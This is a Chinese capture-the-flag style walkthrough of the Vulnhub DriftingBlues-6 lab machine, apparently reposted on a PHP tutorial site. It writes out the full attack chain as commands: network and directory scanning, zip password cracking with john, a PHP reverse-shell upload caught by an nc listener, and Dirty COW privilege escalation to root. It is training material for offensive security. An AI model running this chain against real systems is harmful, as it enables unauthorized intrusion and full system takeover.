IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> 靶机渗透练习Vulnhub DriftingBlues-6 -> 正文阅读

[PHP知识库]靶机渗透练习Vulnhub DriftingBlues-6

攻击机ip

192.168.159.88

扫描主机

arp-scan -I eth0 -l

?得到靶机ip:

192.168.159.144  

扫描端口

nmap -sS -A -sV -T4 -p- 192.168.159.144  

?访问网页

192.168.159.144  

?没发现什么有用的信息

目录扫描

?使用dirb发现了robots.txt和/textpattern/textpattern

dirb 192.168.159.144  

扫描网站的后台 发现了robots.txt ,访问

User-agent: *
Disallow: /textpattern/textpattern

dont forget to add .zip extension to your dir-brute
;)

发现禁止爬取,然后根据提示访问 /textpattern/textpattern 发现了登入后台

进入后台,访问

http://192.168.159.144/textpattern/textpattern/

但是我们没有账号和密码

使用工具gobuster寻找后缀为zip的目录

安装工具gobuster

apt-get install gobuster

安装seclists字典:

apt-get install seclists

扫描目录

gobuster dir -u “192.168.159.144” -w /root/tools/directory-list-2.3-medium.txt -x php,html,txt,zip,bak

指纹识别出是Textpattern CMS

robots.txt中还有提示不要忘了zip,看到扫描结果中有 /spammer.zip,下载得到一个压缩包,尝试打开发现有密码

gobuster dir -u http://192.168.159.144 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x zip

?访问

http://192.168.159.144/spammer.zip

得到一个有密码的zip文件

使用kali破解zip压缩包密码

?1.使用zip2john爆破得到zip密码

zip2john spammer.zip > password.txt

2.使用john破解

john password.txt

?得到密码

myspace4

解压zip文件

得到了一个用户名和密码

mayer:lionheart

用这个用户名和密码登入之前的网址

http://192.168.159.144/textpattern/textpattern/

进去后看到cms的版本是4.8.3

?思路一:kali本地搜索漏洞

searchsploit textpattern 4.8.3 

?查看49620.py详细信息与使用方法

searchsploit -x php/webapps/49620.py

python3 exploit.py -t http://example.com/ -u USER -p PASSWORD -c "whoami" -d

输入命令

因为回看脚本,他会自己给你加一个testpattern,所以url参数就不用加那么多textpattern了

python3 48943.py http://192.168.159.144/textpattern mayer lionheart 

发现还是报错,用不了

思路二:寻找网站内的漏洞

在content那发现存在文件上传

在该处上传kali上的/usr/share/webshells/php/php-reverse-shell.php,上传前需要修ip和port 分别为攻击机ip和攻击机监听的tcp端口。

cd /usr/share/webshells/php

修改php

上传shell

?监听1234端口

nc -nlvp 1234

上传webshell

我们在admin管理界面可以看到上传地址?

访问

http://192.168.159.144/textpattern/files

?点击php-reverse-shell.php

回到kali已经监听成功

获得交互shell

python -c 'import pty; pty.spawn("/bin/bash")'

脏牛提权

查看linux的版本信息

uname -a

内核版本>= 2.6.22 , 尝试脏牛提权

在github上下载提权脚本

https://github.com/FireFart/dirtycow

然后通过网站的文件上传漏洞解压后上传至后台

进入上传文件的文件夹

cd  /var/www/textpattern/files

进行编译,生成一个dirty的可执行文件

gcc -pthread dirty.c -o dirty -lcrypt

执行文件

./dirty

然后会让我们输入一个密码

?然后我们可以用用户名:firefart 密码:root

进入一个有root权限的用户

切换用户

su firefart

进入/root

cd /root

?得到flag.txt

参考文章

http://t.csdn.cn/nvjQG
http://t.csdn.cn/Jp7Ku
https://github.com/FireFart/dirtycow

  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章      下一篇文章      查看所有文章
加:2022-09-30 00:32:20  更:2022-09-30 00:32:50 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年5日历 -2024/5/18 11:43:19-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码